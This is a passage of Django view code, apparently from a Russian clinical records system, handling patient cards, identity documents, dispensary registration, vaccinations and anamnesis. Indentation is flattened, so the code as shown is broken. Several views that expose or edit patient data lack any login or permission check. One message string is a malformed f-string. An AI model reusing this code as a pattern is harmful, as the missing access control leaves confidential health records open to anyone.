queryset=Document.objects.filter(is_active=True, document_type__title__in=['СНИЛС', 'Паспорт гражданина РФ', 'Полис ОМС'])
.distinct("pk", "number", "document_type", "serial")
.select_related('document_type')
.order_by('pk'),
),
'phones_set',
)
.distinct()[:limit]
):
disp_data = sql_func.dispensarization_research(row.individual.sex, row.individual.age_for_year(), row.pk, d1, d2)
status_disp = 'finished'
if not disp_data:
status_disp = 'notneed'
else:
for i in disp_data:
if not i[4]:
status_disp = 'need'
break
data.append(
{
"type_title": card_type.title,
"base_pk": row.base_id,
"num": row.number,
"is_rmis": row.base.is_rmis,
"family": row.individual.family,
"name": row.individual.name,
"twoname": row.individual.patronymic,
"birthday": row.individual.bd(),
"age": row.individual.age_s(),
"fio_age": row.individual.fio(full=True),
"sex": row.individual.sex,
"individual_pk": row.individual_id,
"isArchive": row.is_archive,
"pk": row.pk,
"phones": Phones.phones_to_normalized_list(row.phones_set.all(), row.phone),
"main_diagnosis": row.main_diagnosis,
"docs": [
*[
{
"pk": x.pk,
"type_title": x.document_type.title,
"document_type_id": x.document_type_id,
"serial": x.serial,
"number": x.number,
"is_active": x.is_active,
"date_start": x.date_start,
"date_end": x.date_end,
"who_give": x.who_give,
"from_rmis": x.from_rmis,
"rmis_uid": x.rmis_uid,
}
for x in row.individual.document_set.all()
],
*(
[
{
"pk": -10,
"type_title": "Номер мед.книжки",
"document_type_id": -10,
"serial": "",
"number": str(row.medbook_number),
"is_active": True,
"date_start": None,
"date_end": None,
"who_give": "",
"from_rmis": False,
"rmis_uid": None,
}
] if row.medbook_number else []
)
],
"medbookNumber": row.medbook_number,
"status_disp": status_disp,
"disp_data": disp_data,
}
)
return JsonResponse({"results": data})
@login_required
def patients_search_individual(request):
objects = []
data = []
d = json.loads(request.body)
query = d['query'].strip()
p = re.compile(r'[а-яё]{3}[0-9]{8}', re.IGNORECASE)
p2 = re.compile(r'^([А-яЁё\-]+)( ([А-яЁё\-]+)(( ([А-яЁё\-]*))?( ([0-9]{2}\.[0-9]{2}\.[0-9]{4}))?)?)?$')
p4 = re.compile(r'individual_pk:\d+')
pat_bd = re.compile(r"\d{4}-\d{2}-\d{2}")
if re.search(p, query.lower()):
initials = query[0:3].upper()
btday = query[7:11] + "-" + query[5:7] + "-" + query[3:5]
if not pat_bd.match(btday):
return JsonResponse([], safe=False)
try:
objects = Individual.objects.filter(family__startswith=initials[0], name__startswith=initials[1], patronymic__startswith=initials[2], birthday=btday)
except ValidationError:
objects = []
elif re.search(p2, query):
f, n, p, rmis_req, split = full_patient_search_data(p, query)
objects = Individual.objects.filter(family__istartswith=f, name__istartswith=n, patronymic__istartswith=p)
if len(split) > 3:
objects = Individual.objects.filter(family__istartswith=f, name__istartswith=n, patronymic__istartswith=p, birthday=datetime.datetime.strptime(split[3], "%d.%m.%Y").date())
if re.search(p4, query):
objects = Individual.objects.filter(pk=int(query.split(":")[1]))
n = 0
if not isinstance(objects, list):
for row in objects.distinct().order_by("family", "name", "patronymic", "birthday"):
n += 1
data.append({"family": row.family, "name": row.name, "patronymic": row.patronymic, "birthday": row.bd(), "age": row.age_s(), "sex": row.sex, "pk": row.pk})
if n == 25:
break
return JsonResponse({"results": data})
def patients_search_l2_card(request):
data = []
request_data = json.loads(request.body)
cards = Card.objects.filter(pk=request_data.get('card_pk', -1))
if cards.exists():
card_orig = cards[0]
Card.add_l2_card(card_orig=card_orig)
l2_cards = Card.objects.filter(individual=card_orig.individual, base__internal_type=True)
for row in l2_cards.filter(is_archive=False):
docs = (
Document.objects.filter(individual__pk=row.individual_id, is_active=True, document_type__title__in=['СНИЛС', 'Паспорт гражданина РФ', 'Полис ОМС'])
.distinct("pk", "number", "document_type", "serial")
.order_by('pk')
)
data.append(
{
"type_title": row.base.title,
"num": row.number,
"is_rmis": row.base.is_rmis,
"family": row.individual.family,
"name": row.individual.name,
"twoname": row.individual.patronymic,
"birthday": row.individual.bd(),
"age": row.individual.age_s(),
"sex": row.individual.sex,
"individual_pk": row.individual_id,
"base_pk": row.base_id,
"pk": row.pk,
"phones": row.get_phones(),
"docs": [{**model_to_dict(x), "type_title": x.document_type.title} for x in docs],
"main_diagnosis": row.main_diagnosis,
}
)
return JsonResponse({"results": data})
@login_required
def patients_get_card_data(request, card_id):
card = Card.objects.get(pk=card_id)
c = model_to_dict(card)
i = model_to_dict(card.individual)
docs = [
{**model_to_dict(x), "type_title": x.document_type.title}
for x in Document.objects.filter(individual=card.individual).distinct('pk', "number", "document_type", "serial").order_by('pk')
]
rc = Card.objects.filter(base__is_rmis=True, individual=card.individual)
d = District.objects.all().order_by('-sort_weight', '-id')
return JsonResponse(
{
**i,
**c,
"docs": docs,
"main_docs": card.get_card_documents(),
"main_address_full": card.main_address_full,
"fact_address_full": card.fact_address_full,
"has_rmis_card": rc.exists(),
"av_companies": [{"id": -1, "title": "НЕ ВЫБРАНО", "short_title": ""}, *[model_to_dict(x) for x in Company.objects.filter(active_status=True).order_by('title')]],
"custom_workplace": card.work_place != "",
"work_place_db": card.work_place_db_id or -1,
"district": card.district_id or -1,
"districts": [{"id": -1, "title": "НЕ ВЫБРАН"}, *[{"id": x.pk, "title": x.title} for x in d.filter(is_ginekolog=False)]],
"ginekolog_district": card.ginekolog_district_id or -1,
"gin_districts": [{"id": -1, "title": "НЕ ВЫБРАН"}, *[{"id": x.pk, "title": x.title} for x in d.filter(is_ginekolog=True)]],
"agent_types": [{"key": x[0], "title": x[1]} for x in Card.AGENT_CHOICES if x[0]],
"excluded_types": Card.AGENT_CANT_SELECT,
"agent_need_doc": Card.AGENT_NEED_DOC,
"mother": None if not card.mother else card.mother.get_fio_w_card(),
"mother_pk": card.mother_id,
"father": None if not card.father else card.father.get_fio_w_card(),
"father_pk": card.father_id,
"curator": None if not card.curator else card.curator.get_fio_w_card(),
"curator_pk": card.curator_id,
"agent": None if not card.agent else card.agent.get_fio_w_card(),
"agent_pk": card.agent_id,
"payer": None if not card.payer else card.payer.get_fio_w_card(),
"payer_pk": card.payer_id,
"rmis_uid": rc[0].number if rc.exists() else None,
"doc_types": [{"pk": x.pk, "title": x.title} for x in DocumentType.objects.all()],
"number_poli": card.number_poliklinika,
"harmful": card.harmful_factor,
"medbookNumber": card.medbook_number,
"medbookNumberCustom": card.medbook_number if card.medbook_type == 'custom' else '',
"medbookNumberCustomOriginal": card.medbook_number if card.medbook_type == 'custom' else '',
"medbookType": card.medbook_type,
"medbookTypePrev": card.medbook_type,
"isArchive": card.is_archive,
}
)
@login_required
@group_required("Лечащий врач", "Врач-лаборант", "Оператор лечащего врача", "Оператор Контакт-центра")
def patients_card_save(request):
request_data = json.loads(request.body)
message = ""
messages = []
if "new_individual" in request_data and (request_data["new_individual"] or not Individual.objects.filter(pk=request_data["individual_pk"])) and request_data["card_pk"] < 0:
i = Individual(family=request_data["family"], name=request_data["name"], patronymic=request_data["patronymic"], birthday=request_data["birthday"], sex=request_data["sex"])
i.save()
else:
changed = False
i = Individual.objects.get(pk=request_data["individual_pk"] if request_data["card_pk"] < 0 else Card.objects.get(pk=request_data["card_pk"]).individual_id)
if (
i.family != request_data["family"]
or i.name != request_data["name"]
or i.patronymic != request_data["patronymic"]
or str(i.birthday) != request_data["birthday"]
or i.sex != request_data["sex"]
):
changed = True
i.family = request_data["family"]
i.name = request_data["name"]
i.patronymic = request_data["patronymic"]
i.birthday = datetime.datetime.strptime(request_data["birthday"], "%d.%m.%Y" if '.' in request_data["birthday"] else "%Y-%m-%d").date()
i.sex = request_data["sex"]
i.save()
if Card.objects.filter(individual=i, base__is_rmis=True).exists() and changed:
try:
c = Client(modules=["individuals", "patients"])
c.patients.send_patient(Card.objects.filter(individual=i, base__is_rmis=True)[0])
            except Exception:
messages.append("Синхронизация с РМИС не удалась")
individual_pk = i.pk
if request_data["card_pk"] < 0:
with transaction.atomic():
base = CardBase.objects.select_for_update().get(pk=request_data["base_pk"], internal_type=True)
c = Card(number=Card.next_l2_n(), base=base, individual=i, main_diagnosis="", main_address="", fact_address="")
c.save()
card_pk = c.pk
Log.log(card_pk, 30000, request.user.doctorprofile, request_data)
else:
card_pk = request_data["card_pk"]
c = Card.objects.get(pk=card_pk)
individual_pk = request_data["individual_pk"]
c.main_diagnosis = request_data["main_diagnosis"]
try:
vals = json.loads(request_data["main_address_full"])
c.main_address = vals['address']
c.main_address_fias = vals['fias']
c.main_address_details = vals['details']
    except Exception:
c.main_address = request_data["main_address"]
c.main_address_fias = None
c.main_address_details = None
try:
vals = json.loads(request_data["fact_address_full"])
c.fact_address = vals['address']
c.fact_address_fias = vals['fias']
c.fact_address_details = vals['details']
    except Exception:
c.fact_address = request_data["fact_address"]
c.fact_address_fias = None
c.fact_address_details = None
c.number_poliklinika = request_data.get("number_poli", "")
if request_data["custom_workplace"] or not Company.objects.filter(pk=request_data.get("work_place_db", -1)).exists():
c.work_place_db = None
c.work_place = request_data["work_place"] if request_data["custom_workplace"] else ''
else:
c.work_place_db = Company.objects.get(pk=request_data["work_place_db"])
c.work_place = ''
c.district_id = request_data["district"] if request_data["district"] != -1 else None
c.ginekolog_district_id = request_data["gin_district"] if request_data["gin_district"] != -1 else None
c.work_position = request_data["work_position"]
c.phone = request_data["phone"]
c.harmful_factor = request_data.get("harmful", "")
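    # Medical book number: 'custom' keeps a manually entered number (validated below for
    # range and uniqueness), 'auto' issues the next free number, 'none' clears it; the
    # checks run inside a transaction with the card base row locked, which guards against
    # concurrent saves handing out the same number.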
medbook_type = request_data.get("medbookType", "")
medbook_number = str(request_data.get("medbookNumber", "-1"))
medbook_number_custom = str(request_data.get("medbookNumberCustom", "-1"))
medbook_number = medbook_number if medbook_type != 'custom' else medbook_number_custom
medbook_number_int = int(medbook_number) if medbook_number.isdigit() else None
if medbook_type == 'none' and c.medbook_type != 'none':
c.medbook_number = ''
c.medbook_type = medbook_type
else:
try:
with transaction.atomic():
base = CardBase.objects.select_for_update().get(pk=request_data["base_pk"], internal_type=True)
if medbook_type == 'custom' and medbook_number_int is not None and c.medbook_number != medbook_number_int:
medbook_auto_start = SettingManager.get_medbook_auto_start()
if medbook_number_int <= 1 or medbook_auto_start <= medbook_number_int:
raise Exception("Некорректный номер мед.книжки")
if Card.objects.filter(medbook_number=medbook_number, base=base).exclude(pk=c.pk).exists():
raise Exception(f"Номер {medbook_number} уже есть у другого пациента")
c.medbook_number = medbook_number_int
c.medbook_type = medbook_type
elif (c.medbook_type != 'auto' or c.medbook_number == '') and medbook_type == 'auto':
c.medbook_number = Card.next_medbook_n()
c.medbook_type = medbook_type
except Exception as e:
messages.append(str(e))
c.save()
if c.individual.primary_for_rmis:
try:
c.individual.sync_with_rmis()
        except Exception:
messages.append("Синхронизация с РМИС не удалась")
result = "ok"
return JsonResponse({"result": result, "message": message, "messages": messages, "card_pk": card_pk, "individual_pk": individual_pk})
@login_required
@group_required("Управление иерархией истории")
def patients_card_archive(request):
request_data = json.loads(request.body)
pk = request_data['pk']
card = Card.objects.get(pk=pk)
card.is_archive = True
card.save()
return JsonResponse({"ok": True})
@login_required
@group_required("Управление иерархией истории")
def patients_card_unarchive(request):
request_data = json.loads(request.body)
pk = request_data['pk']
card = Card.objects.get(pk=pk)
if card.is_archive:
n = card.number
if Card.objects.filter(number=n, is_archive=False, base=card.base).exists():
return JsonResponse({"ok": False, "message": "fНомер {n} уже занят другой картой"})
card.is_archive = False
card.save()
return JsonResponse({"ok": True})
def individual_search(request):
result = []
request_data = json.loads(request.body)
tfoms_module = SettingManager.l2('tfoms')
family = request_data["family"]
name = request_data["name"]
patronymic = request_data["patronymic"]
birthday = request_data["birthday"]
forced_gender = []
if tfoms_module and family and name and birthday:
from_tfoms = match_patient(family, name, patronymic, birthday)
for row in from_tfoms:
Individual.import_from_tfoms(row, no_update=True)
forced_gender.append(row['gender'].lower())
for i in Individual.objects.filter(family=family, name=name, patronymic=patronymic, birthday=birthday):
result.append(
{
"pk": i.pk,
"fio": i.fio(full=True),
"docs": [
{**model_to_dict(x), "type_title": x.document_type.title}
for x in Document.objects.filter(individual=i, is_active=True).distinct("number", "document_type", "serial", "date_end", "date_start")
],
"l2_cards": [{"number": x.number, "pk": x.pk} for x in Card.objects.filter(individual=i, base__internal_type=True, is_archive=False)],
}
)
forced_gender.append(i.sex)
forced_gender = None if not forced_gender or forced_gender.count(forced_gender[0]) != len(forced_gender) else forced_gender[0]
return JsonResponse({"result": result, 'forced_gender': forced_gender})
def get_sex_by_param(request):
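    # Guess the sex for the given value (name, family or patronymic) by a majority vote
    # over individuals already stored in the database; ties and empty matches fall back to "м".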
request_data = json.loads(request.body)
t = request_data.get("t")
v = request_data.get("v", "")
r = "м"
if t == "name":
p = Individual.objects.filter(name=v)
r = "м" if p.filter(sex__iexact="м").count() >= p.filter(sex__iexact="ж").count() else "ж"
if t == "family":
p = Individual.objects.filter(family=v)
r = "м" if p.filter(sex__iexact="м").count() >= p.filter(sex__iexact="ж").count() else "ж"
if t == "patronymic":
p = Individual.objects.filter(patronymic=v)
r = "м" if p.filter(sex__iexact="м").count() >= p.filter(sex__iexact="ж").count() else "ж"
return JsonResponse({"sex": r})
def edit_doc(request):
request_data = json.loads(request.body)
pk = request_data["pk"]
serial = request_data["serial"]
number = request_data["number"]
type_o = DocumentType.objects.get(pk=request_data["type"])
is_active = request_data["is_active"]
date_start = request_data["date_start"]
date_start = None if date_start == "" else date_start
date_end = request_data["date_end"]
date_end = None if date_end == "" else date_end
who_give = request_data["who_give"] or ""
if pk == -1:
card = Card.objects.get(pk=request_data["card_pk"])
d = Document(
document_type=type_o,
number=number,
serial=serial,
from_rmis=False,
date_start=date_start,
date_end=date_end,
who_give=who_give,
is_active=is_active,
individual=Individual.objects.get(pk=request_data["individual_pk"]),
)
d.save()
cdu = CardDocUsage.objects.filter(card=card, document__document_type=type_o)
if not cdu.exists():
CardDocUsage(card=card, document=d).save()
else:
for c in cdu:
c.document = d
c.save(update_fields=["document"])
Log.log(d.pk, 30002, request.user.doctorprofile, request_data)
else:
for d in Document.objects.filter(pk=pk, from_rmis=False):
d.number = number
d.serial = serial
d.is_active = is_active
d.date_start = date_start
d.date_end = date_end
d.who_give = who_give
d.save()
Log.log(pk, 30002, request.user.doctorprofile, request_data)
d = Document.objects.get(pk=pk)
try:
d.sync_rmis()
except Exception as e:
print('RMIS error', e) # noqa: T001
return JsonResponse({"ok": True})
def update_cdu(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
doc = Document.objects.get(pk=request_data["doc"])
cdu = CardDocUsage.objects.filter(card=card, document__document_type=doc.document_type)
if not cdu.exists():
CardDocUsage(card=card, document=doc).save()
else:
for c in cdu:
c.document = doc
c.save(update_fields=["document"])
Log.log(card.pk, 30004, request.user.doctorprofile, request_data)
return JsonResponse({"ok": True})
def sync_rmis(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
card.individual.sync_with_rmis()
return JsonResponse({"ok": True})
def sync_tfoms(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
is_new, updated = card.individual.sync_with_tfoms()
return JsonResponse({"ok": True, "is_new": is_new, "updated": updated})
def update_wia(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
key = request_data["key"]
if key in [x[0] for x in Card.AGENT_CHOICES]:
card.who_is_agent = key
card.save()
Log.log(card.pk, 30006, request.user.doctorprofile, request_data)
return JsonResponse({"ok": True})
def edit_agent(request):
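    # Attach or detach an "agent" card (mother, father, curator, payer, ..., see
    # Card.AGENT_CHOICES) on the parent card; keys listed in AGENT_NEED_DOC also store the
    # authorising document, and keys outside AGENT_CANT_SELECT become the card's who_is_agent.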
request_data = json.loads(request.body)
key = request_data["key"]
card = None if not request_data["card_pk"] else Card.objects.get(pk=request_data["card_pk"])
parent_card = Card.objects.filter(pk=request_data["parent_card_pk"])
doc = request_data["doc"] or ''
clear = request_data["clear"]
need_doc = key in Card.AGENT_NEED_DOC
upd = {}
if clear or not card:
upd[key] = None
if need_doc:
upd[key + "_doc_auth"] = ''
if parent_card[0].who_is_agent == key:
upd["who_is_agent"] = ''
else:
upd[key] = card
if need_doc:
upd[key + "_doc_auth"] = doc
if key not in Card.AGENT_CANT_SELECT:
upd["who_is_agent"] = key
for card in parent_card:
for k, v in upd.items():
setattr(card, k, v)
card.save(update_fields=list(upd.keys()))
Log.log(request_data["parent_card_pk"], 30005, request.user.doctorprofile, request_data)
return JsonResponse({"ok": True})
def load_dreg(request):
request_data = json.loads(request.body)
data = []
diagnoses = set()
for a in DispensaryReg.objects.filter(card__pk=request_data["card_pk"]).order_by('date_start', 'pk'):
data.append(
{
"pk": a.pk,
"diagnos": a.diagnos,
"illnes": a.illnes,
"spec_reg": '' if not a.spec_reg else a.spec_reg.title,
"doc_start_reg": '' if not a.doc_start_reg else a.doc_start_reg.get_fio(),
"doc_start_reg_id": a.doc_start_reg_id,
"date_start": '' if not a.date_start else strdate(a.date_start),
"doc_end_reg": '' if not a.doc_end_reg else a.doc_end_reg.get_fio(),
"doc_end_reg_id": a.doc_end_reg_id,
"date_end": '' if not a.date_end else strdate(a.date_end),
"why_stop": a.why_stop,
}
)
if not a.date_end:
diagnoses.add(a.diagnos)
researches = []
specialities = []
researches_data = []
specialities_data = []
card = Card.objects.get(pk=request_data["card_pk"])
visits = VisitPurpose.objects.filter(title__icontains="диспансерн")
year = request_data.get('year', '2020')
for d in sorted(diagnoses):
need = DispensaryPlan.objects.filter(diagnos=d)
for i in need:
if i.research:
if i.research not in researches:
researches.append(i.research)
results = research_last_result_every_month([i.research], card, year)
plans = get_dispensary_reg_plans(card, i.research, None, year)
researches_data.append(
{
"type": "research",
"research_title": i.research.title,
"research_pk": i.research.pk,
"assign_research_pk": i.research.pk,
"assignment": False,
"diagnoses_time": [],
"results": results,
"plans": plans,
"max_time": 1,
"times": len([x for x in results if x]),
}
)
index_res = researches.index(i.research)
researches_data[index_res]['diagnoses_time'].append({"diagnos": i.diagnos, "times": i.repeat})
if i.speciality:
if i.speciality not in specialities:
specialities.append(i.speciality)
results = research_last_result_every_month(Researches.objects.filter(speciality=i.speciality), request_data["card_pk"], year, visits)
plans = get_dispensary_reg_plans(card, None, i.speciality, year)
spec_assign_research = Researches.objects.filter(speciality=i.speciality).first()
specialities_data.append(
{
"type": "speciality",
"research_title": i.speciality.title,
"research_pk": i.speciality.pk,
"assign_research_pk": spec_assign_research.pk if spec_assign_research else None,
"assignment": False,
"diagnoses_time": [],
"results": results,
"plans": plans,
"max_time": 1,
"times": len([x for x in results if x]),
}
)
index_spec = specialities.index(i.speciality)
specialities_data[index_spec]['diagnoses_time'].append({"diagnos": i.diagnos, "times": i.repeat})
researches_data.extend(specialities_data)
return JsonResponse({"rows": data, "researches_data": researches_data, "year": year})
def load_screening(request):
card_pk: int = data_parse(request.body, {'cardPk': int})[0]
screening = ScreeningRegPlan.get_screening_data(card_pk)
return JsonResponse({"data": screening})
def research_last_result_every_month(researches: List[Researches], card: Card, year: str, visits: Optional[List[VisitPurpose]] = None):
results = []
    filters = {
        "napravleniye__client": card,
        "research__in": researches,
        "time_confirmation__year": year,
    }
    if visits:
        filters['purpose__in'] = visits
    for month in range(1, 13):
        iss: Optional[Issledovaniya] = Issledovaniya.objects.filter(**filters, time_confirmation__month=str(month)).order_by("-time_confirmation").first()
if iss:
date = str(localtime(iss.time_confirmation).day).rjust(2, '0')
results.append({"pk": iss.napravleniye_id, "date": date})
else:
results.append(None)
return results
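# Illustrative return value: one entry per month of the requested year, either None
# (no confirmed result in that month) or {"pk": <direction id>, "date": <zero-padded day>}
# for the latest confirmed result, e.g. [None, {'pk': 101, 'date': '17'}, None, ...]
# (the pk value here is made up for the example).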
def get_dispensary_reg_plans(card, research, speciality, year):
plan = [''] * 12
disp_plan = DispensaryRegPlans.objects.filter(card=card, research=research, speciality=speciality, date__year=year)
for d in disp_plan:
if d.date:
plan[d.date.month - 1] = str(d.date.day).rjust(2, '0')
return plan
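# Illustrative return value: for a card with visits planned on 2020-03-05 and 2020-11-20
# the function yields
#   ['', '', '05', '', '', '', '', '', '', '', '20', '']
# i.e. one zero-padded day-of-month string per month of the year, '' where nothing is planned.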
def update_dispensary_reg_plans(request):
request_data = json.loads(request.body)
DispensaryRegPlans.update_plan(request_data["card_pk"], request_data["researches_data_def"], request_data["researches_data"], request_data["year"])
return JsonResponse({"ok": True})
def update_screening_reg_plan(request):
request_data = json.loads(request.body)
ScreeningRegPlan.update_plan(request_data)
return JsonResponse({"ok": True})
def load_vaccine(request):
request_data = json.loads(request.body)
data = []
for a in VaccineReg.objects.filter(card__pk=request_data["card_pk"]).order_by('date', 'pk'):
data.append({"pk": a.pk, "date": strdate(a.date) if a.date else '', "title": a.title, "series": a.series, "amount": a.amount, "method": a.method, "step": a.step, "tap": a.tap})
return JsonResponse({"rows": data})
def load_ambulatory_data(request):
request_data = json.loads(request.body)
data = []
for a in AmbulatoryData.objects.filter(card__pk=request_data["card_pk"]).order_by('date', 'pk'):
data.append({"pk": a.pk, "date": strdate(a.date) if a.date else '', "data": a.data})
return JsonResponse({"rows": data})
def load_benefit(request):
request_data = json.loads(request.body)
data = []
for a in BenefitReg.objects.filter(card__pk=request_data["card_pk"]).order_by('date_start', 'pk'):
data.append(
{
"pk": a.pk,
"benefit": str(a.benefit),
"registration_basis": a.registration_basis,
"doc_start_reg": '' if not a.doc_start_reg else a.doc_start_reg.get_fio(),
"doc_start_reg_id": a.doc_start_reg_id,
"date_start": '' if not a.date_start else strdate(a.date_start),
"doc_end_reg": '' if not a.doc_end_reg else a.doc_end_reg.get_fio(),
"doc_end_reg_id": a.doc_end_reg_id,
"date_end": '' if not a.date_end else strdate(a.date_end),
}
)
return JsonResponse({"rows": data})
def load_dreg_detail(request):
a = DispensaryReg.objects.get(pk=json.loads(request.body)["pk"])
data = {
"diagnos": a.diagnos + ' ' + a.illnes,
"date_start": None if not a.date_start else a.date_start,
"date_end": None if not a.date_end else a.date_end,
"close": bool(a.date_end),
"why_stop": a.why_stop,
"time_index": a.what_times,
"identified_index": a.how_identified,
}
return JsonResponse(data)
def load_vaccine_detail(request):
a = VaccineReg.objects.get(pk=json.loads(request.body)["pk"])
data = {
"date": a.date,
"direction": a.direction,
"title": a.title,
"series": a.series,
"amount": a.amount,
"method": a.method,
"step": a.step,
"tap": a.tap,
"comment": a.comment,
}
return JsonResponse(data)
def load_ambulatory_data_detail(request):
a = AmbulatoryData.objects.get(pk=json.loads(request.body)["pk"])
str_adate = str(a.date)[0:7]
data = {
"date": str_adate,
"data": a.data,
}
return JsonResponse(data)
def load_ambulatory_history(request):
request_data = json.loads(request.body)
result = AmbulatoryDataHistory.objects.filter(card__pk=request_data["card_pk"]).order_by('-created_at')
rows = [{'date': strdate(i.created_at), 'data': i.text} for i in result]
return JsonResponse({"rows": rows})
def load_benefit_detail(request):
pk = json.loads(request.body)["card_pk"]
if pk > -1:
a = BenefitReg.objects.get(pk=pk)
data = {
"benefit_id": a.benefit_id,
"registration_basis": a.registration_basis,
"date_start": '' if not a.date_start else a.date_start,
"date_end": '' if not a.date_end else a.date_end,
"close": bool(a.date_end),
}
else:
data = {
"benefit_id": -1,
"registration_basis": "",
"date_start": '',
"date_end": '',
"close": False,
}
return JsonResponse(
{
"types": [{"pk": -1, "title": 'Не выбрано'}, *[{"pk": x.pk, "title": str(x)} for x in BenefitType.objects.filter(hide=False).order_by('pk')]],
**data,
}
)
@transaction.atomic
def save_dreg(request):
rd = json.loads(request.body)
d = rd["data"]
pk = rd["pk"]
n = False
create_disp_record = False
if pk == -1:
a = DispensaryReg.objects.create(card_id=rd["card_pk"])
pk = a.pk
n = True
create_disp_record = True
else:
pk = rd["pk"]
a = DispensaryReg.objects.get(pk=pk)
Log.log(pk, 40000 if n else 40001, request.user.doctorprofile, rd)
c = False
def fd(s):
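        # convert "dd.mm.yyyy" to ISO "yyyy-mm-dd"; already-ISO input is returned as-is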
if '.' in s:
s = s.split('.')
s = '{}-{}-{}'.format(s[2], s[1], s[0])
return s
    if (
        (not a.date_start and d["date_start"])
        or str(a.date_start) != fd(d["date_start"])
        or a.spec_reg != request.user.doctorprofile.specialities
        or a.doc_start_reg != request.user.doctorprofile
    ):
a.date_start = fd(d["date_start"])
a.doc_start_reg = request.user.doctorprofile
a.spec_reg = request.user.doctorprofile.specialities
c = True
if not a.date_end and d["close"] or (d["close"] and str(a.date_end) != fd(d["date_end"])):
a.date_end = fd(d["date_end"])
a.why_stop = d["why_stop"]
a.doc_end_reg = request.user.doctorprofile
c = True
elif d["close"] and a.why_stop != d["why_stop"]:
a.why_stop = d["why_stop"]
c = True
if not d["close"] and (a.date_end or a.why_stop):
a.date_end = None
a.why_stop = ''
a.doc_end_reg = None
c = True
i = d["diagnos"].split(' ')
ds = i.pop(0)
if len(i) == 0:
i = ''
else:
i = ' '.join(i)
if a.diagnos != ds or a.illnes != i:
a.diagnos = ds
a.illnes = i
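        # guard against duplicates: if an identical registration (same card, diagnosis,
        # start date and registering doctor) already exists, drop the record created above
        # and report failure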
if create_disp_record:
disp_obj = DispensaryReg.objects.filter(card_id=rd["card_pk"], diagnos=ds, date_start=fd(d["date_start"]), doc_start_reg=request.user.doctorprofile)
if disp_obj.exists():
a.delete()
return JsonResponse({"ok": False, "pk": -1, "c": False})
c = True
if d.get('identified_index', 0) != a.how_identified:
a.how_identified = d.get('identified_index', 0)
c = True
if d.get('time_index', 0) != a.what_times:
a.what_times = d.get('time_index', 0)
c = True
if c:
a.save()
return JsonResponse({"ok": True, "pk": pk, "c": c})
@transaction.atomic
def save_vaccine(request):
rd = json.loads(request.body)
d = rd["data"]
pk = rd["pk"]
n = False
if pk == -1:
a = VaccineReg.objects.create(card_id=rd["card_pk"])
pk = a.pk
n = True
else:
pk = rd["pk"]
a = VaccineReg.objects.get(pk=pk)
Log.log(pk, 70000 if n else 70001, request.user.doctorprofile, rd)
c = False
def fd(s):
if '.' in s:
s = s.split('.')
s = '{}-{}-{}'.format(s[2], s[1], s[0])
return s
if str(a.date) != fd(d["date"]):
a.date = fd(d["date"])
c = True
if a.direction != d["direction"]:
a.direction = d["direction"]
c = True
if a.title != d["title"]:
a.title = d["title"]
c = True
if a.series != d["series"]:
a.series = d["series"]
c = True
if a.amount != d["amount"]:
a.amount = d["amount"]
c = True
if a.step != d["step"]:
a.step = d["step"]
c = True
if a.tap != d["tap"]:
a.tap = d["tap"]
c = True
if a.comment != d["comment"]:
a.comment = d["comment"]
c = True
if a.method != d["method"]:
a.method = d["method"]
c = True
if not a.doc:
a.doc = request.user.doctorprofile
c = True
if c:
a.save()
return JsonResponse({"ok": True, "pk": pk, "c": c})
@transaction.atomic
def save_ambulatory_data(request):
rd = json.loads(request.body)
d = rd["data"]
pk = rd["pk"]
date_request = f"{d['date']}-01"
if pk == -1:
a = AmbulatoryData.objects.create(card_id=rd["card_pk"])
pk = a.pk
else:
pk = rd["pk"]
a = AmbulatoryData.objects.get(pk=pk)
c = False
def fd(s):
if '.' in s:
s = s.split('.')
s = '{}-{}-{}'.format(s[2], s[1], s[0])
return s
if str(a.date) != fd(date_request):
a.date = fd(date_request)
c = True
if a.data != d["data"]:
a.data = d["data"]
c = True
if not a.doc:
a.doc = request.user.doctorprofile
c = True
if c:
a.save()
AmbulatoryDataHistory.save_ambulatory_history(rd["card_pk"], request.user.doctorprofile)
return JsonResponse({"ok": True, "pk": pk, "c": c})
@transaction.atomic
def save_benefit(request):
rd = json.loads(request.body)
d = rd["data"]
pk = rd["pk"]
n = False
c = False
if pk == -1:
a = BenefitReg.objects.create(card_id=rd["card_pk"], benefit_id=d["benefit_id"])
pk = a.pk
n = True
else:
pk = rd["pk"]
a = BenefitReg.objects.get(pk=pk)
if a.benefit_id != d["benefit_id"]:
a.benefit_id = d["benefit_id"]
c = True
Log.log(pk, 50000 if n else 50001, request.user.doctorprofile, {**rd, "data": {**{k: v for k, v in rd["data"].items() if k not in ['types']}}})
def fd(s):
if '.' in s:
s = s.split('.')
s = '{}-{}-{}'.format(s[2], s[1], s[0])
return s
if not a.date_start and d["date_start"] or str(a.date_start) != fd(d["date_start"]) or a.doc_start_reg != request.user.doctorprofile:
a.date_start = fd(d["date_start"])
a.doc_start_reg = request.user.doctorprofile
c = True
if a.registration_basis != d["registration_basis"]:
a.registration_basis = d["registration_basis"]
c = True
if not a.date_end and d["close"] or (d["close"] and a.doc_end_reg != request.user.doctorprofile) or (d["close"] and str(a.date_end) != fd(d["date_end"])):
a.date_end = fd(d["date_end"])
a.doc_end_reg = request.user.doctorprofile
c = True
if not d["close"] and a.date_end:
a.date_end = None
a.doc_end_reg = None
c = True
if c:
a.save()
return JsonResponse({"ok": True, "pk": pk, "c": c})
def load_anamnesis(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
history = []
for a in AnamnesisHistory.objects.filter(card=card).order_by('-pk'):
history.append(
{
"pk": a.pk,
"text": a.text,
"who_save": {
"fio": a.who_save.get_fio(dots=True),
"department": a.who_save.podrazdeleniye.get_title(),
},
"datetime": a.created_at.astimezone(pytz.timezone(settings.TIME_ZONE)).strftime("%d.%m.%Y %X"),
}
)
data = {
"text": card.anamnesis_of_life,
"history": history,
}
return JsonResponse(data)
def save_anamnesis(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
if card.anamnesis_of_life != request_data["text"]:
card.anamnesis_of_life = request_data["text"]
card.save()
AnamnesisHistory(card=card, text=request_data["text"], who_save=request.user.doctorprofile).save()
return JsonResponse({"ok": True})
def create_l2_individual_from_card(request):
request_data = json.loads(request.body)
polis = request_data['polis']
has_tfoms_data = False
if SettingManager.l2('tfoms'):
from_tfoms = match_enp(polis)
if from_tfoms:
has_tfoms_data = True
